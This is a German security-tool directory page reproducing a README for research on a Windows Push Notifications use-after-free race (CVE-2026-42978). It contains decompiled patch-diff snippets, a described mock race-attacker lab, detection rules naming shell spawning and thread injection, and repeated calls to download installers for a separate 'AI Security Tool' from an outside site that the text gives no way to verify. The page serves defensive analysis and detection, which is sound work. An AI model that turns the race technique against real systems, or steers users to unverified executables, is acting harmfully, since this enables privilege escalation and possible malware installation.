Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free- und Race-Condition-PoC-Forschung, Diagnose-Scanner und Sicherheitsaudit-Modul für AI Security Tool. | Kitploit
Tools/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
DefensivwerkzeugePrivilege EscalationSchwachstellenscannerSchwachstellenanalyseExploitationBedrohungsanalysePapers & ForschungLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free- und Race-Condition-PoC-Forschung, Diagnose-Scanner und Sicherheitsaudit-Modul für AI Security Tool.

Repository anzeigenWebseite
13vor 17h 25mNoch nicht geprüft
Teilen

CVE-2026-42978
Windows Push Notifications-Modul für AI Security Tool

Next-Gen KI-Sicherheits-Ökosystem, Multi-Protokoll-Terminal & autonome Agenten-Suite


Latest Release Build Status Donations Telegram Channel License

Website · Produktdokumentation · Host-Anwendung · Community-Chat

Website-Navigation: Startseite · Updates · Downloads · Module

Module banner


Offizielle Host-Anwendung

Produkt: AI Security Tool
Website: zerodayevil.github.io
Dokumentation: https://zerodayevil.github.io/ai-security-tool

Dieses Modul ist ein geprüfter Write-up und ein Safe-Check-Profil für AI Security Tool.
Verwende nur Module, die auf der Projektseite oder im offiziellen Katalog aufgeführt sind. Lade dieses Modul innerhalb der genehmigten Anwendung, gegen Endpunkte, die dir gehören oder für die du eine schriftliche Autorisierung zur Bewertung hast.

Dieses Repository liefert keinen weaponisierten Exploit gegen WpnService. Das Lab unter lab/ ist ein eigenständiger Mock der Klasse des Bugs (TOCTOU / Double-Fetch). Es kommuniziert nicht mit dem echten Push-Notification-Dienst.


Schnellstart & Installation

Installiere zuerst die Host-Anwendung. Aktiviere dann dieses Modul über Modules → Windows / Local EoP → CVE-2026-42978.

Sofort einsatzbereite Builds

OS / PlattformVersionArchitektur / FormatAktualisiertStatusDownload
Windowsv6.3.20x64 Installer (.exe)2026-09-08NeuesteDownload .exe
Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08NeuesteDownload .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05StabilDownload .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01StabilDownload .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01StabilDownload .apk

Nur offizielle Quellen:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Konzeptioneller Überblick

CVE-2026-42978 ist eine lokale Rechteausweitung in Windows Push Notifications. Microsoft beschreibt den konkurrierenden Zugriff auf eine gemeinsam genutzte Ressource ohne ordnungsgemäße Synchronisierung (CWE-362). Untersuchungen an gepatchter vs. ungepatchter wpncore.dll zeigen eine Use-After-Free-Race in PresentationEndpointFacade während des Plattform-Shutdowns.

WpnService läuft in Session 0 als NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). Toast-, Tile- und Badge-Zustellung laufen darüber. Ein gewonnenes Race gegen diesen Prozess ist ein SYSTEM-Problem auf der lokalen Maschine — kein Remote-Pre-Auth-DC-Bug.

Status: gepatcht am 10. Juni 2026 (Patch Tuesday). Diese Seite ist defensive Forschung.

Es ist nicht CVE-2026-41089 (Netlogon RCE). Andere Komponente, anderes Privilegienmodell, anderes Patch-Datum.


Spezifikationen

FeldWert
CVECVE-2026-42978
BDUBDU:2026-08249
HerstellerhinweisMSRC — Windows Push Notifications EoP
SchweregradHoch · CVSS 3.1 7.8
SchwachstelleCWE-362 Race Condition · Use-After-Free auf dem Shutdown-Pfad
KomponenteWindows Push Notifications · WpnService · wpncore.dll
AngriffsvektorLokal
Erforderliche PrivilegienNiedrig (autorisierter lokaler Benutzer)
BenutzerinteraktionKeine
Patch Tuesday10. Juni 2026
ModultypResearch-Write-up + In-App-Safe-Check + Detection-Pack

Geltungsbereich

Client- und Server-SKUs, die Push Notifications enthalten. Bestätige das genaue KB auf MSRC, bevor du ein Ticket schließt.

FamilieHinweise
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 je nach Anwendbarkeit)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (Full und Server Core, wo die Komponente existiert)

Orientierungs-Builds aus öffentlichen Servicing-Notes (immer MSRC erneut prüfen):

BranchIndikativer gepatchter Build
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
wpncore.dll Beispiel (24H2)verwundbar 26100.8521 → gepatcht 26100.8655

Ursache (Forschung)

Die Facade umschließt Notification-API-Aufrufe und delegiert an PresentationEndpointImpl. Während des Plattform-Shutdowns wird das NotificationPlatform-Objekt zerstört. Mehrere Facade-Methoden nahmen historisch einen Plattform-Zeiger ohne Shutdown-Flag oder Shared Lock. Gewinnt der Teardown das Race, verwendet der nächste Aufruf einen Dangling Pointer.

Facade, platform, shutdown guard

Dasselbe Lock-and-Guard-Muster wurde auf 49 PresentationEndpointFacade::*-Methoden angewendet. Die darunterliegenden Implementierungsmethoden blieben unverändert — das Loch saß an der Facade.

Ungepatchte Form (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

Gepatchte Form (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

Was der Patch hinzufügt:

  1. AcquireSRWLockShared — Readers-Writer-Lock; Shutdown nimmt exklusiv.
  2. s_platformShutdown — Abbruch mit E_APPLICATION_EXITING, wenn der Teardown begonnen hat.
  3. RAII-Release über WIL unique_storage, sodass das Lock auf Exception-Pfaden freigegeben wird.
  4. Feature-Flag Feature_4097557817 für gestaffeltes Rollout / Rollback.

Umfang des Binary-Diffs

KategorieBeispielfunktionen
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
TileTileCreateSession, TileCloseSession, TileRequestResourceForeground
RegistrierungRegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
EinstellungenChangeAppSetting, QueryAppSetting, QueryGlobalSetting
ZustellungDeliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
AbfragenGetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler

PE-Notizen aus reports/:

  • .text wuchs um 18.432 Bytes
  • .data wuchs um 96 Bytes (Wns::s_platformLock, Wns::s_platformShutdown)
  • keine neuen Imports — SRW-Lock-APIs waren bereits vorhanden
  • neuer RAII-Destruktor für exklusive Lock-Freigabe

Auswirkung

WpnService ist SYSTEM. Wird das Race gewonnen, kann ein Dangling-Vtable-Aufruf in lokale SYSTEM-Codeausführung umgewandelt werden. Dieser Schritt — Heap Spray, Vtable-Hijack, Payload — ist hier außerhalb des Geltungsbereichs.

Dieses Modul dient der Ursachenkompetenz, Patch-Verifikation und Erkennung.


Verwendung dieses Moduls innerhalb von AI Security Tool

  1. Installiere einen aktuellen offiziellen Build von zerodayevil.github.io.
  2. Öffne Modules → CVE-2026-42978.
  3. Richte den Check auf autorisierte Windows-Endpunkte.
  4. Behandle das Ergebnis als Patch-Präsenz / WPN-Posture, nicht als „das Race auslösen“.
  5. Optional: Sammle das Detection-Pack (detection/) auf einer Lab-Box.

Führe keine Crash- oder Race-Schleifen gegen produktives WpnService aus.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

TOCTOU-Lab (nur Mock-Service)

lab/ ist eine eigenständige C-Demo für Double-Fetch / TOCTOU. Sie verwendet eine Named Pipe und Shared Memory. Sie lädt nicht wpncore.dll und startet oder stoppt nicht WpnService.

  • vulnerable_service.exe — validiert eine Länge, schläft, liest die Länge erneut.
  • race_attacker.exe — kippt den geteilten Wert während dieses Fensters.
  • --patched — Single-Fetch in eine lokale Variable; derselbe Angreifer sollte null Races sehen.

Erfordert GCC (MinGW). Aus lab/:

root@kitploit:~
build.bat

Terminal 1: vulnerable_service.exe
Terminal 2: race_attacker.exe 5
Dann mit vulnerable_service.exe --patched vergleichen.

TOCTOU race condition demo


Erkennung und Threat Hunting

ETW-Monitor — detection/etw_wpn_monitor.ps1

Sieben Prüfungen:

  1. WpnService-Status und PID
  2. Crash- / Neustart-Historie
  3. Push Notifications Platform Event-Log-Burst
  4. WPN-bezogene Named Pipes
  5. Patch-Hinweis (wpncore.dll Datum / Build)
  6. Prozesse mit geladenen WPN-Modulen
  7. Junction- / Symlink-Audit unter Notification-Datenpfaden
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

RegelWofür sie dient
WPN_EoP_ChildProcesssvchost (netsvcs) startet cmd / powershell / wscript
WPN_PipeAccessVerbindungen zu WPN-bezogenen Named Pipes
WPN_FileCreationDateierstellung unter Notification-Datenverzeichnissen
WPN_RegistryTamperingSchreibzugriffe unter PushNotifications-Schlüsseln
WPN_ProcessAccessPROCESS_ALL_ACCESS auf svchost
WPN_ThreadInjectionCreateRemoteThread in svchost
root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

Ereignisanzeige

Kanal: Microsoft-Windows-PushNotifications-Platform/Operational

  • Ereignis 1225 — WPN-Kommandos auf Transportebene
  • Burst-Rate (zum Beispiel >20/min) — einen Blick wert, keine Verurteilung
  • Error / Critical — möglicher Crash durch einen fehlgeschlagenen Versuch

Event Viewer WPN operational log


Mitigations-Checkliste

  • Juni 2026 Cumulative Update auf jeder betroffenen SKU
  • wpncore.dll-Build entspricht der gepatchten Zeile für diesen Branch
  • EDR / Sysmon auf Workstations und Jump Boxes, nicht nur auf DCs
  • Alarm bei svchost -k netsvcs, das eine Shell startet
  • Host-App-Modulergebnis zusammen mit dem Hotfix-Inventar archiviert

Wenn etw_wpn_monitor.ps1 ungepatcht meldet — installiere das Juni-2026-Update und prüfe erneut.


Verwandte CVEs (Juni 2026 WPN-Cluster)

CVEKlasse
CVE-2026-42977EoP · Race
CVE-2026-42978EoP · Race (dieses Modul)
CVE-2026-42979EoP · Race
CVE-2026-42991EoP · Race
CVE-2026-42969Informationsoffenlegung · Race
CVE-2026-42970Informationsoffenlegung · Race
CVE-2026-42973Informationsoffenlegung · Race
CVE-2026-26167EoP
CVE-2026-32160EoP

Repository-Struktur

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

Voraussetzungen: Windows 10/11 für die Detection-Skripte · MinGW für das Mock-Lab · Sysmon optional.

Screenshots in dieser README werden von öffentlichen Bild-URLs geladen. Sie sind nicht in diesem Tree gespeichert.


Referenzen

  • MSRC — CVE-2026-42978
  • CVE-Eintrag
  • BDU:2026-08249

Katalog der Sicherheitsmodule

Remote Code Execution & Netzwerkprobleme 4 Module
  • CVE-2026-41089 — Windows Netlogon-Modul · @ZeroDayEvil
  • CVE-2026-20805 — Windows RCE-Modul · @ZeroDayEvil
  • CVE-2026-41096 — Kritisches RCE-Check-Modul · @ZeroDayEvil
  • CVE-2026-24291 — Netzwerkprotokoll-Modul · @ZeroDayVPN
Rechteausweitung & Dienste 2 Module
  • CVE-2026-66804 — CrossDevice-Dienst EoP · @ZeroDayVPN
  • CVE-2026-42978 — Windows Push Notifications EoP (dieses Repo) · @ZeroDayEvil
Forschung & Write-ups 2 Module
  • CVE-2026-50416 — Write-up zur lokalen Rechteausweitung · @ZeroDayEvil
  • CVE-2026-83991 — Write-up-Modul · @ZeroDayVPN

Beiträge & Community

Nützliche Arbeit:

  1. Fakten — MSRC-Builds, verwandte CVEs im Juni-WPN-Cluster.
  2. Erkennung — Sigma, besseres ETW, ASR-Empfehlungen.
  3. Host-App-Metadaten und Übersetzungen.
  4. Dokumentation und Korrekturen defekter Links.

Öffne keinen PR, der einen weaponisierten WpnService-Exploit, Heap-Spray-Helfer oder Exploit-PoC gegen den Live-Dienst hinzufügt.


Kontakt & Support

  • Website: zerodayevil.github.io
  • Produktdokumentation: zerodayevil.github.io/ai-security-tool
  • Telegram-Admin: @ZeroDayEvil
  • Telegram-Chat: @ZeroDyaTool_chat
  • Telegram-Kanal: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

Lizenz & Rechtliches

Veröffentlicht unter der MIT-Lizenz. Siehe LICENSE.

Nur autorisierte defensive Forschung und Systemadministration.
Lokale Privilege-Escalation-Tests ohne schriftliche Autorisierung sind illegal.

Die Schwachstelle ist gepatcht. Halte Windows aktuell. Dieses Repository enthält keinen weaponisierten Exploit gegen den Live-Dienst.


AI Security Tool — Terminal-Workflow und Automatisierung für Cybersicherheits-Profis.

Defensives Modul für zerodayevil.github.io · Kein eigenständiger WpnService-Exploit · Fakten auf MSRC verifizieren

Tool herunterladen